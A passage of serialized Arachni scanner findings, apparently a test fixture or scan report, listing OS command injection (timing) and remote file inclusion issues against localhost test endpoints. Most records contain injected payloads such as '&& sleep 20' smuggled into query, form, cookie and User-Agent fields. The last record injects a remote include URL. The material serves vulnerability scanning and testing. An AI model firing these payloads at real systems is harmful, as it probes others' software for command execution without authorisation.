  elem: link
  internal_modname: OSCmdInjectionTiming
  metasploitable: unix/webapp/arachni_exec
  method: GET
  mod_name: OS command injection (timing)
  name: Operating system command injection (timing attack)
  references: 
    OWASP: http://www.owasp.org/index.php/OS_Command_Injection
  remedy_code: ""
  remedy_guidance: |-
    User inputs must be validated and filtered
        before being evaluated as OS level commands.
  severity: High
  tags: 
  - os
  - command
  - code
  - injection
  - timing
  - blind
  url: http://localhost:11226/bsd/link/straight?input=default
  var: input
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "9.0"
    cwe: "78"
    cwe_url: http://cwe.mitre.org/data/definitions/78.html
    description: |-
      The web application allows an attacker to
          execute arbitrary OS commands even though it does not return
          the command output in the HTML body.
          (This issue was discovered using a timing attack; timing attacks
          can result in false positives in cases where the server takes
          an abnormally long time to respond.
          Either case, these issues will require further investigation
          even if they are false positives.)
    elem: link
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
        Cookie: cookie=cookie+value
      response: {}

    id: 
    injected: " sleep 20"
    internal_modname: OSCmdInjectionTiming
    metasploitable: unix/webapp/arachni_exec
    method: GET
    mod_name: OS command injection (timing)
    name: Operating system command injection (timing attack)
    opts: 
      :redundant: false
      :async: true
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 1
      :timeout: 14000.0
      :timeout_divider: 1000
      :timing_string: " sleep __TIME__"
      :skip_orig: true
      :injected_orig: " sleep 20"
      :altered: input
      :element: link
      :params: 
        input: " sleep 20"
      :follow_location: true
      :injected: " sleep 20"
      :combo: 
        input: " sleep 20"
      :action: http://localhost:11226/bsd/link/straight?input=default
      :silent: true
      :regexp: ""
    references: 
      OWASP: http://www.owasp.org/index.php/OS_Command_Injection
    regexp: ""
    regexp_match: 
    remedy_code: ""
    remedy_guidance: |-
      User inputs must be validated and filtered
          before being evaluated as OS level commands.
    response: ""
    severity: High
    tags: 
    - os
    - command
    - code
    - injection
    - timing
    - blind
    url: http://localhost:11226/bsd/link/straight?input=default
    var: input
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "9.0"
  cwe: "78"
  cwe_url: http://cwe.mitre.org/data/definitions/78.html
  description: |-
    The web application allows an attacker to
        execute arbitrary OS commands even though it does not return
        the command output in the HTML body.
        (This issue was discovered using a timing attack; timing attacks
        can result in false positives in cases where the server takes
        an abnormally long time to respond.
        Either case, these issues will require further investigation
        even if they are false positives.)
  elem: cookie
  internal_modname: OSCmdInjectionTiming
  metasploitable: unix/webapp/arachni_exec
  method: GET
  mod_name: OS command injection (timing)
  name: Operating system command injection (timing attack)
  references: 
    OWASP: http://www.owasp.org/index.php/OS_Command_Injection
  remedy_code: ""
  remedy_guidance: |-
    User inputs must be validated and filtered
        before being evaluated as OS level commands.
  severity: High
  tags: 
  - os
  - command
  - code
  - injection
  - timing
  - blind
  url: http://localhost:11226/bsd/cookie/straight
  var: cookie
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "9.0"
    cwe: "78"
    cwe_url: http://cwe.mitre.org/data/definitions/78.html
    description: |-
      The web application allows an attacker to
          execute arbitrary OS commands even though it does not return
          the command output in the HTML body.
          (This issue was discovered using a timing attack; timing attacks
          can result in false positives in cases where the server takes
          an abnormally long time to respond.
          Either case, these issues will require further investigation
          even if they are false positives.)
    elem: cookie
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
        Cookie: cookie=+sleep+20
      response: {}

    id: 
    injected: " sleep 20"
    internal_modname: OSCmdInjectionTiming
    metasploitable: unix/webapp/arachni_exec
    method: GET
    mod_name: OS command injection (timing)
    name: Operating system command injection (timing attack)
    opts: 
      :redundant: false
      :async: true
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 1
      :timeout: 14000.0
      :timeout_divider: 1000
      :timing_string: " sleep __TIME__"
      :skip_orig: true
      :injected_orig: " sleep 20"
      :altered: cookie
      :element: cookie
      :params: {}

      :follow_location: true
      :cookies: 
        cookie: " sleep 20"
      :injected: " sleep 20"
      :combo: 
        cookie: " sleep 20"
      :action: http://localhost:11226/bsd/cookie/straight
      :silent: true
      :regexp: ""
    references: 
      OWASP: http://www.owasp.org/index.php/OS_Command_Injection
    regexp: ""
    regexp_match: 
    remedy_code: ""
    remedy_guidance: |-
      User inputs must be validated and filtered
          before being evaluated as OS level commands.
    response: ""
    severity: High
    tags: 
    - os
    - command
    - code
    - injection
    - timing
    - blind
    url: http://localhost:11226/bsd/cookie/straight
    var: cookie
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "9.0"
  cwe: "78"
  cwe_url: http://cwe.mitre.org/data/definitions/78.html
  description: |-
    The web application allows an attacker to
        execute arbitrary OS commands even though it does not return
        the command output in the HTML body.
        (This issue was discovered using a timing attack; timing attacks
        can result in false positives in cases where the server takes
        an abnormally long time to respond.
        Either case, these issues will require further investigation
        even if they are false positives.)
  elem: header
  internal_modname: OSCmdInjectionTiming
  metasploitable: unix/webapp/arachni_exec
  method: GET
  mod_name: OS command injection (timing)
  name: Operating system command injection (timing attack)
  references: 
    OWASP: http://www.owasp.org/index.php/OS_Command_Injection
  remedy_code: ""
  remedy_guidance: |-
    User inputs must be validated and filtered
        before being evaluated as OS level commands.
  severity: High
  tags: 
  - os
  - command
  - code
  - injection
  - timing
  - blind
  url: http://localhost:11226/bsd/header/straight
  var: User-Agent
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "9.0"
    cwe: "78"
    cwe_url: http://cwe.mitre.org/data/definitions/78.html
    description: |-
      The web application allows an attacker to
          execute arbitrary OS commands even though it does not return
          the command output in the HTML body.
          (This issue was discovered using a timing attack; timing attacks
          can result in false positives in cases where the server takes
          an abnormally long time to respond.
          Either case, these issues will require further investigation
          even if they are false positives.)
    elem: header
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: "&& sleep 20"
        Cookie: cookie=cookie+value
      response: {}

    id: 
    injected: "&& sleep 20"
    internal_modname: OSCmdInjectionTiming
    metasploitable: unix/webapp/arachni_exec
    method: GET
    mod_name: OS command injection (timing)
    name: Operating system command injection (timing attack)
    opts: 
      :redundant: false
      :async: true
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 1
      :timeout: 14000.0
      :timeout_divider: 1000
      :timing_string: "&& sleep __TIME__"
      :skip_orig: true
      :injected_orig: "&& sleep 20"
      :altered: User-Agent
      :element: header
      :params: 
      :follow_location: true
      :headers: 
        User-Agent: "&& sleep 20"
      :injected: "&& sleep 20"
      :combo: 
        User-Agent: "&& sleep 20"
      :action: http://localhost:11226/bsd/header/straight
      :silent: true
      :regexp: ""
    references: 
      OWASP: http://www.owasp.org/index.php/OS_Command_Injection
    regexp: ""
    regexp_match: 
    remedy_code: ""
    remedy_guidance: |-
      User inputs must be validated and filtered
          before being evaluated as OS level commands.
    response: ""
    severity: High
    tags: 
    - os
    - command
    - code
    - injection
    - timing
    - blind
    url: http://localhost:11226/bsd/header/straight
    var: User-Agent
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "9.0"
  cwe: "78"
  cwe_url: http://cwe.mitre.org/data/definitions/78.html
  description: |-
    The web application allows an attacker to
        execute arbitrary OS commands even though it does not return
        the command output in the HTML body.
        (This issue was discovered using a timing attack; timing attacks
        can result in false positives in cases where the server takes
        an abnormally long time to respond.
        Either case, these issues will require further investigation
        even if they are false positives.)
  elem: form
  internal_modname: OSCmdInjectionTiming
  metasploitable: unix/webapp/arachni_exec
  method: POST
  mod_name: OS command injection (timing)
  name: Operating system command injection (timing attack)
  references: 
    OWASP: http://www.owasp.org/index.php/OS_Command_Injection
  remedy_code: ""
  remedy_guidance: |-
    User inputs must be validated and filtered
        before being evaluated as OS level commands.
  severity: High
  tags: 
  - os
  - command
  - code
  - injection
  - timing
  - blind
  url: http://localhost:11226/solaris/form/straight
  var: input
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "9.0"
    cwe: "78"
    cwe_url: http://cwe.mitre.org/data/definitions/78.html
    description: |-
      The web application allows an attacker to
          execute arbitrary OS commands even though it does not return
          the command output in the HTML body.
          (This issue was discovered using a timing attack; timing attacks
          can result in false positives in cases where the server takes
          an abnormally long time to respond.
          Either case, these issues will require further investigation
          even if they are false positives.)
    elem: form
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
        Cookie: cookie=cookie+value
      response: {}

    id: 
    injected: " sleep 20"
    internal_modname: OSCmdInjectionTiming
    metasploitable: unix/webapp/arachni_exec
    method: POST
    mod_name: OS command injection (timing)
    name: Operating system command injection (timing attack)
    opts: 
      :redundant: false
      :async: true
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 1
      :timeout: 14000.0
      :timeout_divider: 1000
      :timing_string: " sleep __TIME__"
      :skip_orig: true
      :injected_orig: " sleep 20"
      :altered: input
      :element: form
      :params: 
        input: " sleep 20"
      :follow_location: true
      :injected: " sleep 20"
      :combo: 
        input: " sleep 20"
      :action: http://localhost:11226/solaris/form/straight
      :silent: true
      :regexp: ""
    references: 
      OWASP: http://www.owasp.org/index.php/OS_Command_Injection
    regexp: ""
    regexp_match: 
    remedy_code: ""
    remedy_guidance: |-
      User inputs must be validated and filtered
          before being evaluated as OS level commands.
    response: ""
    severity: High
    tags: 
    - os
    - command
    - code
    - injection
    - timing
    - blind
    url: http://localhost:11226/solaris/form/straight
    var: input
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "9.0"
  cwe: "78"
  cwe_url: http://cwe.mitre.org/data/definitions/78.html
  description: |-
    The web application allows an attacker to
        execute arbitrary OS commands even though it does not return
        the command output in the HTML body.
        (This issue was discovered using a timing attack; timing attacks
        can result in false positives in cases where the server takes
        an abnormally long time to respond.
        Either case, these issues will require further investigation
        even if they are false positives.)
  elem: link
  internal_modname: OSCmdInjectionTiming
  metasploitable: unix/webapp/arachni_exec
  method: GET
  mod_name: OS command injection (timing)
  name: Operating system command injection (timing attack)
  references: 
    OWASP: http://www.owasp.org/index.php/OS_Command_Injection
  remedy_code: ""
  remedy_guidance: |-
    User inputs must be validated and filtered
        before being evaluated as OS level commands.
  severity: High
  tags: 
  - os
  - command
  - code
  - injection
  - timing
  - blind
  url: http://localhost:11226/solaris/link/straight?input=default
  var: input
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "9.0"
    cwe: "78"
    cwe_url: http://cwe.mitre.org/data/definitions/78.html
    description: |-
      The web application allows an attacker to
          execute arbitrary OS commands even though it does not return
          the command output in the HTML body.
          (This issue was discovered using a timing attack; timing attacks
          can result in false positives in cases where the server takes
          an abnormally long time to respond.
          Either case, these issues will require further investigation
          even if they are false positives.)
    elem: link
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
        Cookie: cookie=cookie+value
      response: {}

    id: 
    injected: " sleep 20"
    internal_modname: OSCmdInjectionTiming
    metasploitable: unix/webapp/arachni_exec
    method: GET
    mod_name: OS command injection (timing)
    name: Operating system command injection (timing attack)
    opts: 
      :redundant: false
      :async: true
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 1
      :timeout: 14000.0
      :timeout_divider: 1000
      :timing_string: " sleep __TIME__"
      :skip_orig: true
      :injected_orig: " sleep 20"
      :altered: input
      :element: link
      :params: 
        input: " sleep 20"
      :follow_location: true
      :injected: " sleep 20"
      :combo: 
        input: " sleep 20"
      :action: http://localhost:11226/solaris/link/straight?input=default
      :silent: true
      :regexp: ""
    references: 
      OWASP: http://www.owasp.org/index.php/OS_Command_Injection
    regexp: ""
    regexp_match: 
    remedy_code: ""
    remedy_guidance: |-
      User inputs must be validated and filtered
          before being evaluated as OS level commands.
    response: ""
    severity: High
    tags: 
    - os
    - command
    - code
    - injection
    - timing
    - blind
    url: http://localhost:11226/solaris/link/straight?input=default
    var: input
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "9.0"
  cwe: "78"
  cwe_url: http://cwe.mitre.org/data/definitions/78.html
  description: |-
    The web application allows an attacker to
        execute arbitrary OS commands even though it does not return
        the command output in the HTML body.
        (This issue was discovered using a timing attack; timing attacks
        can result in false positives in cases where the server takes
        an abnormally long time to respond.
        Either case, these issues will require further investigation
        even if they are false positives.)
  elem: cookie
  internal_modname: OSCmdInjectionTiming
  metasploitable: unix/webapp/arachni_exec
  method: GET
  mod_name: OS command injection (timing)
  name: Operating system command injection (timing attack)
  references: 
    OWASP: http://www.owasp.org/index.php/OS_Command_Injection
  remedy_code: ""
  remedy_guidance: |-
    User inputs must be validated and filtered
        before being evaluated as OS level commands.
  severity: High
  tags: 
  - os
  - command
  - code
  - injection
  - timing
  - blind
  url: http://localhost:11226/solaris/cookie/straight
  var: cookie
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "9.0"
    cwe: "78"
    cwe_url: http://cwe.mitre.org/data/definitions/78.html
    description: |-
      The web application allows an attacker to
          execute arbitrary OS commands even though it does not return
          the command output in the HTML body.
          (This issue was discovered using a timing attack; timing attacks
          can result in false positives in cases where the server takes
          an abnormally long time to respond.
          Either case, these issues will require further investigation
          even if they are false positives.)
    elem: cookie
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
        Cookie: cookie=+sleep+20
      response: {}

    id: 
    injected: " sleep 20"
    internal_modname: OSCmdInjectionTiming
    metasploitable: unix/webapp/arachni_exec
    method: GET
    mod_name: OS command injection (timing)
    name: Operating system command injection (timing attack)
    opts: 
      :redundant: false
      :async: true
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 1
      :timeout: 14000.0
      :timeout_divider: 1000
      :timing_string: " sleep __TIME__"
      :skip_orig: true
      :injected_orig: " sleep 20"
      :altered: cookie
      :element: cookie
      :params: {}

      :follow_location: true
      :cookies: 
        cookie: " sleep 20"
      :injected: " sleep 20"
      :combo: 
        cookie: " sleep 20"
      :action: http://localhost:11226/solaris/cookie/straight
      :silent: true
      :regexp: ""
    references: 
      OWASP: http://www.owasp.org/index.php/OS_Command_Injection
    regexp: ""
    regexp_match: 
    remedy_code: ""
    remedy_guidance: |-
      User inputs must be validated and filtered
          before being evaluated as OS level commands.
    response: ""
    severity: High
    tags: 
    - os
    - command
    - code
    - injection
    - timing
    - blind
    url: http://localhost:11226/solaris/cookie/straight
    var: cookie
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "9.0"
  cwe: "78"
  cwe_url: http://cwe.mitre.org/data/definitions/78.html
  description: |-
    The web application allows an attacker to
        execute arbitrary OS commands even though it does not return
        the command output in the HTML body.
        (This issue was discovered using a timing attack; timing attacks
        can result in false positives in cases where the server takes
        an abnormally long time to respond.
        Either case, these issues will require further investigation
        even if they are false positives.)
  elem: header
  internal_modname: OSCmdInjectionTiming
  metasploitable: unix/webapp/arachni_exec
  method: GET
  mod_name: OS command injection (timing)
  name: Operating system command injection (timing attack)
  references: 
    OWASP: http://www.owasp.org/index.php/OS_Command_Injection
  remedy_code: ""
  remedy_guidance: |-
    User inputs must be validated and filtered
        before being evaluated as OS level commands.
  severity: High
  tags: 
  - os
  - command
  - code
  - injection
  - timing
  - blind
  url: http://localhost:11226/solaris/header/straight
  var: User-Agent
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "9.0"
    cwe: "78"
    cwe_url: http://cwe.mitre.org/data/definitions/78.html
    description: |-
      The web application allows an attacker to
          execute arbitrary OS commands even though it does not return
          the command output in the HTML body.
          (This issue was discovered using a timing attack; timing attacks
          can result in false positives in cases where the server takes
          an abnormally long time to respond.
          Either case, these issues will require further investigation
          even if they are false positives.)
    elem: header
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: "&& sleep 20"
        Cookie: cookie=cookie+value
      response: {}

    id: 
    injected: "&& sleep 20"
    internal_modname: OSCmdInjectionTiming
    metasploitable: unix/webapp/arachni_exec
    method: GET
    mod_name: OS command injection (timing)
    name: Operating system command injection (timing attack)
    opts: 
      :redundant: false
      :async: true
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 1
      :timeout: 14000.0
      :timeout_divider: 1000
      :timing_string: "&& sleep __TIME__"
      :skip_orig: true
      :injected_orig: "&& sleep 20"
      :altered: User-Agent
      :element: header
      :params: 
      :follow_location: true
      :headers: 
        User-Agent: "&& sleep 20"
      :injected: "&& sleep 20"
      :combo: 
        User-Agent: "&& sleep 20"
      :action: http://localhost:11226/solaris/header/straight
      :silent: true
      :regexp: ""
    references: 
      OWASP: http://www.owasp.org/index.php/OS_Command_Injection
    regexp: ""
    regexp_match: 
    remedy_code: ""
    remedy_guidance: |-
      User inputs must be validated and filtered
          before being evaluated as OS level commands.
    response: ""
    severity: High
    tags: 
    - os
    - command
    - code
    - injection
    - timing
    - blind
    url: http://localhost:11226/solaris/header/straight
    var: User-Agent
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "9.0"
  cwe: "78"
  cwe_url: http://cwe.mitre.org/data/definitions/78.html
  description: |-
    The web application allows an attacker to
        execute arbitrary OS commands even though it does not return
        the command output in the HTML body.
        (This issue was discovered using a timing attack; timing attacks
        can result in false positives in cases where the server takes
        an abnormally long time to respond.
        Either case, these issues will require further investigation
        even if they are false positives.)
  elem: form
  internal_modname: OSCmdInjectionTiming
  metasploitable: unix/webapp/arachni_exec
  method: POST
  mod_name: OS command injection (timing)
  name: Operating system command injection (timing attack)
  references: 
    OWASP: http://www.owasp.org/index.php/OS_Command_Injection
  remedy_code: ""
  remedy_guidance: |-
    User inputs must be validated and filtered
        before being evaluated as OS level commands.
  severity: High
  tags: 
  - os
  - command
  - code
  - injection
  - timing
  - blind
  url: http://localhost:11226/windows/form/straight
  var: input
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "9.0"
    cwe: "78"
    cwe_url: http://cwe.mitre.org/data/definitions/78.html
    description: |-
      The web application allows an attacker to
          execute arbitrary OS commands even though it does not return
          the command output in the HTML body.
          (This issue was discovered using a timing attack; timing attacks
          can result in false positives in cases where the server takes
          an abnormally long time to respond.
          Either case, these issues will require further investigation
          even if they are false positives.)
    elem: form
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
        Cookie: cookie=cookie+value
      response: {}

    id: 
    injected: " sleep 20"
    internal_modname: OSCmdInjectionTiming
    metasploitable: unix/webapp/arachni_exec
    method: POST
    mod_name: OS command injection (timing)
    name: Operating system command injection (timing attack)
    opts: 
      :redundant: false
      :async: true
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 1
      :timeout: 14000.0
      :timeout_divider: 1000
      :timing_string: " sleep __TIME__"
      :skip_orig: true
      :injected_orig: " sleep 20"
      :altered: input
      :element: form
      :params: 
        input: " sleep 20"
      :follow_location: true
      :injected: " sleep 20"
      :combo: 
        input: " sleep 20"
      :action: http://localhost:11226/windows/form/straight
      :silent: true
      :regexp: ""
    references: 
      OWASP: http://www.owasp.org/index.php/OS_Command_Injection
    regexp: ""
    regexp_match: 
    remedy_code: ""
    remedy_guidance: |-
      User inputs must be validated and filtered
          before being evaluated as OS level commands.
    response: ""
    severity: High
    tags: 
    - os
    - command
    - code
    - injection
    - timing
    - blind
    url: http://localhost:11226/windows/form/straight
    var: input
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "9.0"
  cwe: "78"
  cwe_url: http://cwe.mitre.org/data/definitions/78.html
  description: |-
    The web application allows an attacker to
        execute arbitrary OS commands even though it does not return
        the command output in the HTML body.
        (This issue was discovered using a timing attack; timing attacks
        can result in false positives in cases where the server takes
        an abnormally long time to respond.
        Either case, these issues will require further investigation
        even if they are false positives.)
  elem: link
  internal_modname: OSCmdInjectionTiming
  metasploitable: unix/webapp/arachni_exec
  method: GET
  mod_name: OS command injection (timing)
  name: Operating system command injection (timing attack)
  references: 
    OWASP: http://www.owasp.org/index.php/OS_Command_Injection
  remedy_code: ""
  remedy_guidance: |-
    User inputs must be validated and filtered
        before being evaluated as OS level commands.
  severity: High
  tags: 
  - os
  - command
  - code
  - injection
  - timing
  - blind
  url: http://localhost:11226/windows/link/straight?input=default
  var: input
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "9.0"
    cwe: "78"
    cwe_url: http://cwe.mitre.org/data/definitions/78.html
    description: |-
      The web application allows an attacker to
          execute arbitrary OS commands even though it does not return
          the command output in the HTML body.
          (This issue was discovered using a timing attack; timing attacks
          can result in false positives in cases where the server takes
          an abnormally long time to respond.
          Either case, these issues will require further investigation
          even if they are false positives.)
    elem: link
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
        Cookie: cookie=cookie+value
      response: {}

    id: 
    injected: " sleep 20"
    internal_modname: OSCmdInjectionTiming
    metasploitable: unix/webapp/arachni_exec
    method: GET
    mod_name: OS command injection (timing)
    name: Operating system command injection (timing attack)
    opts: 
      :redundant: false
      :async: true
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 1
      :timeout: 14000.0
      :timeout_divider: 1000
      :timing_string: " sleep __TIME__"
      :skip_orig: true
      :injected_orig: " sleep 20"
      :altered: input
      :element: link
      :params: 
        input: " sleep 20"
      :follow_location: true
      :injected: " sleep 20"
      :combo: 
        input: " sleep 20"
      :action: http://localhost:11226/windows/link/straight?input=default
      :silent: true
      :regexp: ""
    references: 
      OWASP: http://www.owasp.org/index.php/OS_Command_Injection
    regexp: ""
    regexp_match: 
    remedy_code: ""
    remedy_guidance: |-
      User inputs must be validated and filtered
          before being evaluated as OS level commands.
    response: ""
    severity: High
    tags: 
    - os
    - command
    - code
    - injection
    - timing
    - blind
    url: http://localhost:11226/windows/link/straight?input=default
    var: input
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "9.0"
  cwe: "78"
  cwe_url: http://cwe.mitre.org/data/definitions/78.html
  description: |-
    The web application allows an attacker to
        execute arbitrary OS commands even though it does not return
        the command output in the HTML body.
        (This issue was discovered using a timing attack; timing attacks
        can result in false positives in cases where the server takes
        an abnormally long time to respond.
        Either case, these issues will require further investigation
        even if they are false positives.)
  elem: cookie
  internal_modname: OSCmdInjectionTiming
  metasploitable: unix/webapp/arachni_exec
  method: GET
  mod_name: OS command injection (timing)
  name: Operating system command injection (timing attack)
  references: 
    OWASP: http://www.owasp.org/index.php/OS_Command_Injection
  remedy_code: ""
  remedy_guidance: |-
    User inputs must be validated and filtered
        before being evaluated as OS level commands.
  severity: High
  tags: 
  - os
  - command
  - code
  - injection
  - timing
  - blind
  url: http://localhost:11226/windows/cookie/straight
  var: cookie
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "9.0"
    cwe: "78"
    cwe_url: http://cwe.mitre.org/data/definitions/78.html
    description: |-
      The web application allows an attacker to
          execute arbitrary OS commands even though it does not return
          the command output in the HTML body.
          (This issue was discovered using a timing attack; timing attacks
          can result in false positives in cases where the server takes
          an abnormally long time to respond.
          Either case, these issues will require further investigation
          even if they are false positives.)
    elem: cookie
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
        Cookie: cookie=+sleep+20
      response: {}

    id: 
    injected: " sleep 20"
    internal_modname: OSCmdInjectionTiming
    metasploitable: unix/webapp/arachni_exec
    method: GET
    mod_name: OS command injection (timing)
    name: Operating system command injection (timing attack)
    opts: 
      :redundant: false
      :async: true
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 1
      :timeout: 14000.0
      :timeout_divider: 1000
      :timing_string: " sleep __TIME__"
      :skip_orig: true
      :injected_orig: " sleep 20"
      :altered: cookie
      :element: cookie
      :params: {}

      :follow_location: true
      :cookies: 
        cookie: " sleep 20"
      :injected: " sleep 20"
      :combo: 
        cookie: " sleep 20"
      :action: http://localhost:11226/windows/cookie/straight
      :silent: true
      :regexp: ""
    references: 
      OWASP: http://www.owasp.org/index.php/OS_Command_Injection
    regexp: ""
    regexp_match: 
    remedy_code: ""
    remedy_guidance: |-
      User inputs must be validated and filtered
          before being evaluated as OS level commands.
    response: ""
    severity: High
    tags: 
    - os
    - command
    - code
    - injection
    - timing
    - blind
    url: http://localhost:11226/windows/cookie/straight
    var: cookie
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "9.0"
  cwe: "78"
  cwe_url: http://cwe.mitre.org/data/definitions/78.html
  description: |-
    The web application allows an attacker to
        execute arbitrary OS commands even though it does not return
        the command output in the HTML body.
        (This issue was discovered using a timing attack; timing attacks
        can result in false positives in cases where the server takes
        an abnormally long time to respond.
        Either case, these issues will require further investigation
        even if they are false positives.)
  elem: header
  internal_modname: OSCmdInjectionTiming
  metasploitable: unix/webapp/arachni_exec
  method: GET
  mod_name: OS command injection (timing)
  name: Operating system command injection (timing attack)
  references: 
    OWASP: http://www.owasp.org/index.php/OS_Command_Injection
  remedy_code: ""
  remedy_guidance: |-
    User inputs must be validated and filtered
        before being evaluated as OS level commands.
  severity: High
  tags: 
  - os
  - command
  - code
  - injection
  - timing
  - blind
  url: http://localhost:11226/windows/header/straight
  var: User-Agent
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "9.0"
    cwe: "78"
    cwe_url: http://cwe.mitre.org/data/definitions/78.html
    description: |-
      The web application allows an attacker to
          execute arbitrary OS commands even though it does not return
          the command output in the HTML body.
          (This issue was discovered using a timing attack; timing attacks
          can result in false positives in cases where the server takes
          an abnormally long time to respond.
          Either case, these issues will require further investigation
          even if they are false positives.)
    elem: header
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: "&& sleep 20"
        Cookie: cookie=cookie+value
      response: {}

    id: 
    injected: "&& sleep 20"
    internal_modname: OSCmdInjectionTiming
    metasploitable: unix/webapp/arachni_exec
    method: GET
    mod_name: OS command injection (timing)
    name: Operating system command injection (timing attack)
    opts: 
      :redundant: false
      :async: true
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 1
      :timeout: 14000.0
      :timeout_divider: 1000
      :timing_string: "&& sleep __TIME__"
      :skip_orig: true
      :injected_orig: "&& sleep 20"
      :altered: User-Agent
      :element: header
      :params: 
      :follow_location: true
      :headers: 
        User-Agent: "&& sleep 20"
      :injected: "&& sleep 20"
      :combo: 
        User-Agent: "&& sleep 20"
      :action: http://localhost:11226/windows/header/straight
      :silent: true
      :regexp: ""
    references: 
      OWASP: http://www.owasp.org/index.php/OS_Command_Injection
    regexp: ""
    regexp_match: 
    remedy_code: ""
    remedy_guidance: |-
      User inputs must be validated and filtered
          before being evaluated as OS level commands.
    response: ""
    severity: High
    tags: 
    - os
    - command
    - code
    - injection
    - timing
    - blind
    url: http://localhost:11226/windows/header/straight
    var: User-Agent
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "7.5"
  cwe: "94"
  cwe_url: http://cwe.mitre.org/data/definitions/94.html
  description: |-
    The web application can be forced to include
        3rd party remote content which can often lead to arbitrary code
        execution, amongst other attacks.
  elem: form
  internal_modname: RFI
  metasploitable: unix/webapp/arachni_php_include
  method: GET
  mod_name: Remote File Inclusion
  name: Remote file inclusion
  references: 
    WASC: http://projects.webappsec.org/Remote-File-Inclusion
    Wikipedia: http://en.wikipedia.org/wiki/Remote_File_Inclusion
  remedy_code: ""
  remedy_guidance: |-
    Enforce strict validation and filtering
                        on user inputs.
  severity: High
  tags: 
  - remote
  - file
  - inclusion
  - injection
  - regexp
  url: http://localhost:9251/form/straight
  var: input
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "7.5"
    cwe: "94"
    cwe_url: http://cwe.mitre.org/data/definitions/94.html
    description: |-
      The web application can be forced to include
          3rd party remote content which can often lead to arbitrary code
          execution, amongst other attacks.
    elem: form
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
        Cookie: cookie2=cookie+value;cookie=cookie+value
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Connection: close
        Server: thin 1.4.1 codename Chromeo
    id: 705cd559b16e6946826207c2199bd890
    injected: hTtP://arachni.github.com/arachni/rfi.md5.txt
    internal_modname: RFI
    metasploitable: unix/webapp/arachni_php_include
    method: GET
    mod_name: Remote File Inclusion
    name: Remote file inclusion
    opts: 
      :redundant: false
      :async: true
      :regexp: 705cd559b16e6946826207c2199bd890
      :match: 705cd559b16e6946826207c2199bd890
      :substring: 705cd559b16e6946826207c2199bd890
      :ignore: 
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :follow_location: false
      :injected_orig: hTtP://arachni.github.com/arachni/rfi.md5.txt
      :altered: input
      :element: form
      :params: 
        input: hTtP://arachni.github.com/arachni/rfi.md5.txt
      :injected: hTtP://arachni.github.com/arachni/rfi.md5.txt
      :combo: 
        input: hTtP://arachni.github.com/arachni/rfi.md5.txt
      :action: http://localhost:9251/form/straight
      :verification: false
